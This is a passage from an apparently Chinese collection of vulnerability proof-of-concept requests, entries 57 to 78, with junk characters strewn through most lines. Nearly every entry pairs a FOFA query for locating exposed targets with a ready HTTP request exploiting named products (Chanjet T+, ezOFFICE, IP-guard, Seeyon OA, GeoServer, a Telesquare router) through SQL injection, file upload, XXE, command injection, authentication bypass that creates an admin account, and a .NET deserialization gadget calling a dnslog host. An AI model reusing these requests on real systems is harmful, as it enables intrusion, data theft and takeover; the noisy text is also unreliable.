User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
8 A0 v' u% _3 k8 j2 e$ _. W9 AContent-Type: application/json
% {7 M7 U/ u8 [1 M+ w- I1 {- Z! V2 x6 l3 J( a8 L
{4 f6 l, d; w9 g
  "storeID":{+ x3 a" Z4 Q. q0 ]
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",3 B4 L8 ?/ q4 S3 M+ K+ |1 i, b
"MethodName":"Start",
6 _+ o* @! Y  H" i$ P5 t! x "ObjectInstance":{& r- N0 F; E0 I8 j& h2 y3 K( h3 X& P
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
9 ?) |' d$ x2 Y' H6 t3 o( P4 r       "StartInfo": {
2 S5 W  V9 v8 Q) k, z+ I          "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",6 D! U  F' v" P) I8 w! v
         "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"8 R6 w+ s  u; f  L6 }
   }
5 L$ v- c3 P# J8 e* Y }
) t# e0 Q( z/ B2 m5 K" H  }
! [( u7 g1 y) B8 ^! E}
8 O# M! p0 A4 |# a# X7 W2 K2 T. W* ?# R  B8 ^4 X2 a# x% i5 A
, S! I1 D9 s! w3 [2 B9 c/ D
57. 畅捷通T+ keyEdit.aspx SQL注入
% R( ]2 W/ T( [, ]. ?FOFA：app="畅捷通-TPlus"
; v' E, o1 n7 W5 N' d5 D# G0 YGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1, d- r  d3 {' I7 c2 q
Host: host
" }* ^" t$ F1 |; a/ A  `- pUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36. R+ w  G" W, q, s6 m6 @
Accept-Charset: utf-8
! p) Z4 O0 ^8 g% y( ^& A/ y6 iAccept-Encoding: gzip, deflate
. S! A, |+ G+ `+ _Connection: close& ^" F0 A' k, m% _( O. h
' R+ A" `: z. }6 e  f3 L- l
2 P( X* B3 d' t+ e% h1 E
58. 畅捷通T+ KeyInfoList.aspx sql注入/ X3 A/ S: d# i4 `
FOFA：app="畅捷通-TPlus"
4 z/ A! D* r( _1 }- cGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1& d; T; _: f4 H* ?+ `
Host: your-ip
& A8 i5 P: U: N' m2 aUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
6 P9 G9 l! Q8 q7 k4 kAccept-Charset: utf-8
: ?) \# W) j3 V( dAccept-Encoding: gzip, deflate
) b0 p; H/ U# I* \: O& |' gConnection: close
. c5 I" ^- {& X/ S, @& M1 x9 y
3 m4 e& \) o  D" h$ G* N" \# @6 |( h+ @. J6 K! V
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
: a4 |2 J% |4 g# x/ ]. f; sFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"% c+ a- x, d* P1 T
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.18 @7 v0 u  u7 V8 X  Z8 _9 g
Host: 192.168.86.128:9090
+ C% H4 O# O" C; `# s5 rUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
+ R% V; R  }1 v1 o: |6 gConnection: close
: K2 E1 B9 ]! S: g6 l: CContent-Length: 1669: V' w1 u6 [- Q* W% t9 S* K
Accept: */*
6 r# W# @0 v( u' V$ IAccept-Language: en
, J7 D, Q! f* ?" s2 tContent-Type: application/x-www-form-urlencoded
$ ~& [/ G7 l' Z( C& t" FAccept-Encoding: gzip- y( z* R& A! }: V: n8 P2 y
" o' n! J' r8 {% Z8 E
PAYLOAD! Z9 Y$ U/ T' q9 s7 ^7 d

. v! z& V9 l6 N8 a: F. e" ]2 u
) }( _) A! V2 _( H$ K8 p60. 百卓Smart管理平台 importexport.php SQL注入
) g9 _2 l: C& [7 a# W9 }FOFA：title="Smart管理平台"; r; `" L3 v" d2 Z- S7 _
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1& s, q" M  G% s7 `3 h0 Y6 u. Q
Host:: i, ^  ], |- ~& V1 F- Q( P# w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
$ ^) U! J7 k( I# y, Y+ QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 c: s6 J# x2 X  _6 }
Accept-Encoding: gzip, deflate
% R1 g. y! M7 S/ M* b0 \" LAccept-Language: zh-CN,zh;q=0.9
( R, e" p9 x4 l, |9 X1 A! BConnection: close% F+ T) V( ^. }
! V+ O' W( h, S' N0 l$ U
# Q8 l% I8 _- l+ q
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传9 F/ V& g6 |3 i, `3 c
FOFA: title="欢迎使用浙大恩特客户资源管理系统"- Z1 S+ T" k) ?3 _
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.10 q! `2 Q6 A+ t" \
Host: x.x.x.x: @6 ?# I! ~0 _4 g( j  w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' {* }/ E% ~$ B! ]7 ~Connection: close8 q( r& B; C  j+ }
Content-Length: 27/ }. f# e0 |+ o7 G8 w
Accept: */*
+ j* O; \$ X/ Z) `4 w8 rAccept-Encoding: gzip, deflate! S' t- p' h& T& w/ Y4 Z7 @
Accept-Language: en
3 X$ Q5 i" y) e3 K) [- SContent-Type: application/x-www-form-urlencoded
$ P: S0 W$ \* R; }
6 t8 J5 P  @0 ^; H  {1 d, q" C/ z8uxssX66eqrqtKObcVa0kid98xa
9 b  \& t7 X: V
9 ]8 M, u9 y/ c, [) q! n- w
: {! d6 h) L7 s4 j7 H62. IP-guard WebServer 远程命令执行
7 e. `5 o% z3 M% j8 g, SFOFA："IP-guard" && icon_hash="2030860561"3 l: o( l" C" r- s: {3 d( r8 {
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1! k$ Z0 D$ s1 k, N4 R: A" E
Host: x.x.x.x. z* D1 @3 M$ ?& b; z4 c
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
( S" c* Z7 y2 eConnection: close
' h: j9 L  T! p4 ^0 ^( [& w6 [Accept: */*4 _/ q( L* t& q/ \
Accept-Language: en7 K. C3 \$ b, e3 K+ t
Accept-Encoding: gzip2 ^" X) X+ G. Z4 a  a) t
; n1 K& K4 b! w8 p  Q

& s1 }  ]) c* c5 u, S' m8 o. _访问
8 g" t( Q6 u8 O7 p, \; O  t" v2 }; I, C- Q) C
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1% }, n* F8 z- E
Host: x.x.x.x+ j# {! b$ U4 ~9 R, E6 F
8 Y5 ?( t8 \' x" N

2 U# u  i+ _9 P( q! ]9 m- ?63. IP-guard WebServer任意文件读取
$ p2 ^. W" Y  F' m  YIP-guard < 4.82.0609.0
( }6 H1 ^1 n& B  O' eFOFA：icon_hash="2030860561"% ]1 C. Z0 v- f) T1 L& L8 s
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
1 a7 X1 r* |# k5 Y: L* J8 c9 |Host: your-ip
; e5 e- G# M; h0 `! m7 N. [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
; q! k8 v  Y5 I0 j9 i$ e' i% WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 m  L  T. L! x5 }& d) w; Q" x
Accept-Encoding: gzip, deflate/ B: ?$ @/ M/ Y) Q) r
Accept-Language: zh-CN,zh;q=0.9
# v' r+ X- a  i% k5 uConnection: close& t+ _: S  C& _6 @( L9 m3 M! {
Content-Type: application/x-www-form-urlencoded
4 p) c: w9 i$ Y% q; {* `7 E
! ?1 q) p5 B- c* Q) b! Kpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
! H8 _) n; |, ?- s& c5 y3 ?9 x- M+ \# f  F" }7 D* n- b
64. 捷诚管理信息系统CWSFinanceCommon SQL注入6 t, O7 p/ N% S2 I( a3 C
FOFA：body="/Scripts/EnjoyMsg.js"
, o1 {1 D* C! @, I' q! |POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1- |( _7 [0 B+ @$ R' x* u
Host: 192.168.86.128:9001& k0 d6 s9 c; r! E' ^" K( H  L4 U, n
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
& x$ \8 F' ?/ D  e0 NConnection: close& q: Y, H# i' b: |1 \8 Y
Content-Length: 369
) }' M! L, V) l( J7 G% W, o* f+ i, AAccept: */*& B1 B$ @4 ^7 ]! A( }9 m
Accept-Language: en3 P# `; N& u9 X
Content-Type: text/xml; charset=utf-8* V* O8 i% i( a2 y  `/ L9 N
Accept-Encoding: gzip2 W: X/ ]  \9 ^

4 V  ~) R( S8 x* H8 y5 v! ]7 @6 c4 F<?xml version="1.0" encoding="utf-8"?>
% I, u5 X, r; e# |  f, F5 T$ ?  Z<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' F, g* H2 [0 }1 l
<soap:Body>6 E* I$ |+ {3 u8 r
<GetOSpById xmlns="http://tempuri.org/">
/ w" y  K1 g! U2 x    <sId>1';waitfor delay '0:0:5'--+</sId>2 |0 {9 i: T' G0 k1 Y8 J, a
</GetOSpById>( }- I( o2 e' S! Y! F9 j# [! q
  </soap:Body>4 G0 {# U1 O* g' d4 d
</soap:Envelope>! ^* @( W% H$ @; O9 q. N4 Z

) A+ }+ q1 O: l7 |1 a
) y9 v4 k9 p% H/ x65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
$ A6 {3 h7 D! r# ~5 e+ h* aFOFA：title="欢迎使用脸爱云一脸通智慧管理平台"# n$ x  ~5 t7 h" Q- s. }- |: J
响应200即成功创建账号test123456/123456  C/ X7 k8 U$ N2 l; k6 i8 X# ?
POST /SystemMng.ashx HTTP/1.14 R& e6 [( N* B, k
Host:
8 o6 I% E* K$ `* p& TUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
& o1 ^; l8 t# u, \Accept-Encoding: gzip, deflate
; K, O/ \( u- q5 [* ?) Z8 @7 pAccept: */*
1 M4 t( w; x# c7 K0 ?  R2 WConnection: close
9 o5 }8 q5 W: F7 u4 t, C% n- HAccept-Language: en" J6 E+ i" k7 f! a2 o; c; V
Content-Length: 174
6 o4 q$ w5 Z' O4 \+ p1 u( z4 e: Z/ T8 t. v$ u+ a( y7 w  E/ F
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
( J& I* a0 F, k. ?2 G3 a' j9 P& F) r1 _# `8 L8 Y; Q8 j9 p  Y
, h4 H4 z/ c6 {! g9 z) Z1 D) {
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
% D' p1 B- G2 y. S1 b2 h4 E; uFOFA：app="万户ezOFFICE协同管理平台"
8 I3 n$ h9 G" Q3 y$ ?3 [0 D) C5 g# I& C( ]# X4 v& x
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
6 O8 B- Q( n; i6 S! b1 Y) yHost: x.x.x.x
4 O0 @- c( F' }9 Y+ y" G2 W( R$ kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36, S7 k# ]/ Q) |; w; p; T
Connection: close5 i. r3 }9 P3 |/ S$ P) m( }
Accept: */*
3 P" B. ^0 n3 k( yAccept-Language: en4 V7 \" W: ], i( `9 P
Accept-Encoding: gzip4 u/ d! ?2 `$ F

9 i. s' f/ }# t  m- j
! P7 ^4 Z- }" A* Z" N+ j/ J$ H第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在% J" B9 q. a! Q1 h  @: g9 x

& G8 z! v" _3 s( ]67. 万户ezOFFICE wpsservlet任意文件上传
5 q+ \! t! H$ W& ?! a' ]2 i7 SFOFA：app="万户网络-ezOFFICE"' @+ e2 z' g5 e+ u/ J4 K4 }
newdocId和filename参数表示写入文件名称，dir参数表示写入文件的路径，fileType参数表示文件类型
' [0 `' V; p) e4 WPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
& z9 L- Y; Q+ n0 nHost: x.x.x.x
/ b+ D- v9 G$ Y+ C5 I( g. x$ S2 F7 p4 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0* G& R7 p( y3 i
Content-Length: 173
! X, S2 _8 }$ I1 A& \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8# G% C  o2 @# U( j; f7 k0 K
Accept-Encoding: gzip, deflate
" a: M$ S$ M3 q2 O+ CAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
# w1 O4 V& i6 uConnection: close  c* k& \* y4 n- M! M4 {! `2 h
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp$ v$ ^9 v1 @  `0 R
DNT: 15 e4 {/ |& y( R  ^8 ?
Upgrade-Insecure-Requests: 1
0 J. K/ V3 ?& k# U8 H4 {
$ q5 J2 D% W' B* T--ufuadpxathqvxfqnuyuqaozvseiueerp
% R" q' K1 U% n1 K- `& t; KContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
0 V* ~9 ?8 E# _6 o( h0 `% w: Z7 G" \
<% out.print("sasdfghjkj");%>0 K$ b( i# _2 ?& b/ H
--ufuadpxathqvxfqnuyuqaozvseiueerp--& G  W3 C& _3 q, C9 y
* t6 }" i& ^1 K3 o6 U$ x; x9 l
0 R4 [+ I; C1 [( j/ b9 I/ U
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp2 V2 E1 w+ ]" [& l+ \

7 ~- Q4 R% K  |; S3 W$ R8 `68. 万户ezOFFICE wf_printnum.jsp SQL注入0 j! b6 v& N$ q; D- R9 y- r
FOFA：app="万户ezOFFICE协同管理平台"
- K- _0 w; [' o9 B0 tGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
. n' b: u  F% A# DHost: {{host}}* ~6 D( w2 u7 P3 u7 A' \3 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.369 A9 l1 k. T  R; o0 Y* x
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8" z* c2 ^. B/ R9 g+ z/ i7 z4 m2 E' y
Accept-Encoding: gzip, deflate
. m% j' w( ~+ c# g$ QAccept-Language: zh-CN,zh;q=0.9
3 }- h8 J1 V. t9 _! MConnection: close# V) y* S" P# n! h+ _6 }" ?

5 ~! }, G' s* ?5 |3 M  _: K
1 x3 O0 c5 D$ J+ D7 d- D8 _69. 万户 ezOFFICE contract_gd.jsp SQL注入
  `2 l" \, ?9 |FOFA：app="万户ezOFFICE协同管理平台"4 {* k/ X" W4 m- s4 S; H/ `6 T
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.18 e! a; S- f! H9 C1 s" y- q
Host: your-ip
8 z- R1 p: Z- o6 Y4 O/ P8 EUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
1 w7 A2 k6 k( ^4 \& n; B0 IAccept-Encoding: gzip, deflate
& v$ Z: t6 x3 c+ VAccept: */*
2 ?% H) }  C: ]# p& `Connection: keep-alive
9 h! L. E7 T) P$ J- Q
( b8 o. d6 d2 c$ g; _( g6 [9 K2 r) Z, t! G, Q& ?
70. 万户ezEIP success 命令执行5 ]. ?5 o& Y, B& W$ f& f. E
FOFA：app="万户网络-ezEIP"
: I2 Z5 E* s# h) Y6 Q9 Y, XPOST /member/success.aspx HTTP/1.1
5 u9 i+ z* v+ p  f$ q; pHost: {{Hostname}}
6 ?6 t# n2 l/ i0 @, ^# L0 J# wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36# d/ }( f+ X5 @0 X
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
: M& h5 G: R7 O8 a$ k  j* F# Z) eContent-Type: application/x-www-form-urlencoded* Z: L5 Q* j2 l% `; P; [! ?+ L) C
TYPE: C/ M0 T- K2 ?, p. T' M9 d
Content-Length: 16702+ h" g# Y- Z9 H# S' r& f( S( @
( b2 I8 D9 g! D' |9 P0 X
__VIEWSTATE=PAYLOAD
* e3 l. @: r8 Q6 ~4 F: Q; R; O6 X4 [8 }6 q/ h

. S) m1 ]3 D. l* U% \71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
  c! C. o5 {# C9 `4 X1 K* _7 ^& FFOFA：body="PM2项目管理系统BS版增强工具.zip"
5 ]1 V, i- h5 a/ w7 sGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1; r) K" U: l; M
Host: x.x.x.xx.x.x.x% m7 Y$ f0 @6 N
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.369 E; ^/ I- ], ?
Connection: close: _2 E& n& b5 X. ?% U; y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! z% Q  S7 B, P+ \: R! J
Accept-Encoding: gzip, deflate4 r# [8 c! ]8 G+ B) G2 e: m$ y& t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! i# i2 b& ?3 i! b' RUpgrade-Insecure-Requests: 1
* p9 f5 f( x1 e( {- `6 P6 R+ w# k( g/ |) R5 P/ E9 P, h& j, U
* m) E. j& R. T: t
72. 致远OA getAjaxDataServlet XXE
$ E( e% B  C: j$ @/ T8 Q& @  xFOFA：app="致远互联-OA"
/ [  u% `0 }' ?0 ?" W1 _; dPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1- l2 N4 @7 N: E" m2 S- s
Host: 192.168.40.131:80990 j! L; J4 Q: X! A1 m
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36% q$ [1 [! J$ {4 P; K: h; z& g
Connection: close
- `8 z6 e3 b2 R; N# b% k* R& gContent-Length: 583, P7 g; M9 o1 ?' m+ G+ ?4 U& S
Content-Type: application/x-www-form-urlencoded
8 o* e6 F+ @% U! L' ?. tAccept-Encoding: gzip
/ n# u$ a, l* Q" B' y" L' w0 A8 [" g0 I: p( \/ M% q, S! [! Q
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
, Y* b1 ^- q& `, e2 k- ?; M! o5 |; n5 ~. t6 @
; T  k9 F3 o+ X" ?( c% h2 R+ ^
73. GeoServer wms远程代码执行1 v" Y3 ^; s% f. k& U
FOFA：icon_hash=”97540678”8 t) @6 T* b6 L9 J# }  w0 }  a* S
POST /geoserver/wms HTTP/1.15 @( L0 s2 v& W, J
Host:3 F" x& L; M8 o8 C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.364 t, i& r/ I  m0 Q1 v( t2 T+ `
Content-Length: 19817 m  {5 E. ^( ?: }1 c
Accept-Encoding: gzip, deflate4 H- c8 d9 J# a2 C
Connection: close
* q' _& O0 ?4 a3 QContent-Type: application/xml# p. N# C6 v8 t: ]- n# I
SL-CE-SUID: 3  c3 k9 s0 X2 P8 H: z

+ S1 c2 W# w$ C/ L* ^PAYLOAD
9 c' d5 y' ~( g& v. R- U  X/ T. y( f& m" U8 N! q, b
" G5 \  _/ y! d3 @& [- J% C
74. 致远M3-server 6_1sp1 反序列化RCE& F* c1 B6 Z' m
FOFA：title="M3-Server"
+ c4 O8 T" y1 o% L) HPAYLOAD0 H" Y+ {/ F) T  C
1 b5 y7 d1 f1 m% g/ |
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE& \2 X" m  f2 O+ j& B
FOFA：app="TELESQUARE-TLR-2005KSH"
$ r' i, Z9 z* W% D: B+ PGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
; b/ |: d. r' [; a8 L: XHost: x.x.x.x5 `) D6 {% g0 G( `& X4 c9 k9 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 m$ n1 r/ P6 F4 K5 C
Connection: close
3 {2 P! f6 t8 ^5 |/ E9 bAccept: */*3 w5 h  A- z+ a
Accept-Language: en
2 z6 W, J1 O4 o% XAccept-Encoding: gzip8 J8 ~3 L8 U; j" W( G- C, V# {
; S/ i5 I3 x& a/ A* Q

6 Z! T" |  ?$ n& _( l# VGET /cgi-bin/test28256.txt HTTP/1.13 F9 G( ^% L$ @  `) L
Host: x.x.x.x
. O" H0 e* R4 X/ W1 U2 w1 W# S; _6 k5 f  W4 ]& b& V
5 D6 S% L  T6 Y, a0 I( m% _
76. 新开普掌上校园服务管理平台service.action远程命令执行0 q5 M; _8 T; F! I2 m  N5 k( X7 G* c7 [
FOFA：title="掌上校园服务管理平台"
9 `: Q+ T. G- SPOST /service_transport/service.action HTTP/1.1# G+ n6 D1 i5 E' q3 \/ e4 U$ X, N
Host: x.x.x.x( Q: @+ }/ E( O" V5 o$ K" c, ~* x/ @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
; L# Q. m) T  H- Z* o. k5 P+ uConnection: close2 b" k! W1 X9 Z1 |, ]( F, Q2 O
Content-Length: 211
% ^, d& J: Y6 J6 j9 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* l  j3 ?$ p, u2 C( f3 g
Accept-Encoding: gzip, deflate
& d8 v& u& ^3 i' W' w$ tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- v2 A' E# x8 K) W. z  r! _' ~
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4$ i; U/ t3 B9 B; @' K
Upgrade-Insecure-Requests: 1
2 @6 N; a; X$ ^2 V% Q: r7 h& s5 Q0 _+ t/ r: T: O$ t
{: o& J' R1 G0 E
"command": "GetFZinfo",
: _; T9 ]6 ~2 x  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
/ H/ i% w6 w+ V; _) i! u3 F  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
3 p' d! u- s) a) y. N}+ z/ u  C2 C1 T7 O: X
- W* K- f7 ~% u1 T
3 X) n. x/ D4 E3 }0 ]6 n$ O% `3 n
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
+ J3 m/ S2 K; K) k0 H8 _Host: x.x.x.x7 T- K, N: X+ w; M4 f% E" w

7 m/ S8 i) \0 |7 d3 }& v& z
5 d7 W: s( Q$ u0 h* O
, R! @% J' B: g5 G# L" Y9 L, P77. F22服装管理软件系统UploadHandler.ashx任意文件上传
; ^3 I1 U6 ~9 q, E% DFOFA：body="F22WEB登陆"; X( L/ r; `9 _- W4 l) O
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.13 a, u) i; `. r0 M% o" o
Host: x.x.x.x! d8 t3 m8 i* @7 D  o, I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
( A0 [  S1 c" v. }/ dConnection: close
Content-Length: 433
5 d. b1 h; \( {# rAccept: */*
' \: h2 |" S8 P9 X7 @. g  [0 Q2 DAccept-Encoding: gzip, deflate/ Z2 V' I! x. h2 M0 j5 D
Accept-Language: zh-CN,zh;q=0.9- R6 `) F; {0 c1 Y* o7 @  J2 F
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
0 z! T8 ?4 Z' e, w$ o4 |6 n) a; a8 m0 O$ w' d$ x
------------398jnjVTTlDVXHlE7yYnfwBoix
& e% v/ ]8 c5 k+ N' bContent-Disposition: form-data; name="folder"
3 [) b( \2 ~$ ]# ?! U# s: `: q
' ~8 ^$ g, W: S4 F; y; o$ S/ S/upload/udplog
  J2 N8 ]; |8 c( R* d2 N+ B0 t------------398jnjVTTlDVXHlE7yYnfwBoix' \% A9 k, v" ~
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
; ?0 e& W" C" T2 C) A: P8 X- IContent-Type: application/octet-stream  \2 v6 B' k1 p7 S% c

; A: B( E, z8 \& M- chello1234567
% v8 d4 B" @: C7 v9 h) G------------398jnjVTTlDVXHlE7yYnfwBoix
3 V* d5 l; p2 U0 N; h  H8 `Content-Disposition: form-data; name="Upload"% ~/ K9 ~1 o$ y5 z4 }# \3 u
& N4 W* f- {! A% f9 Z4 N
Submit Query
+ _0 b; @/ B' z( F" q7 W$ g6 a------------398jnjVTTlDVXHlE7yYnfwBoix--
/ P+ A9 {) _& X' E0 _0 w1 c2 j
9 C$ R6 M/ j# k5 ~2 C+ a
3 F8 E$ ]) X  L: {8 |78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
: B, o# |% p! ^% S' [& jFOFA：icon_hash="2001627082"
$ H2 ~, X" t- t8 W3 `! NPOST /Platform/System/FileUpload.ashx HTTP/1.1
, O5 e) `  j0 g; R/ g3 u7 D( AHost: x.x.x.x
2 ]# t% g; i; B# A+ }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) b+ ]$ T& y+ y4 g
Connection: close
) x2 H% U9 z" o) Q5 N7 F+ N7 qContent-Length: 336
: B8 L7 {4 i, aAccept-Encoding: gzip
, Q2 p% {% c  w8 I" p' ]Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
- {& X! r) q3 k' R9 O
& p$ g+ l9 N, L------YsOxWxSvj1KyZow1PTsh98fdu6l
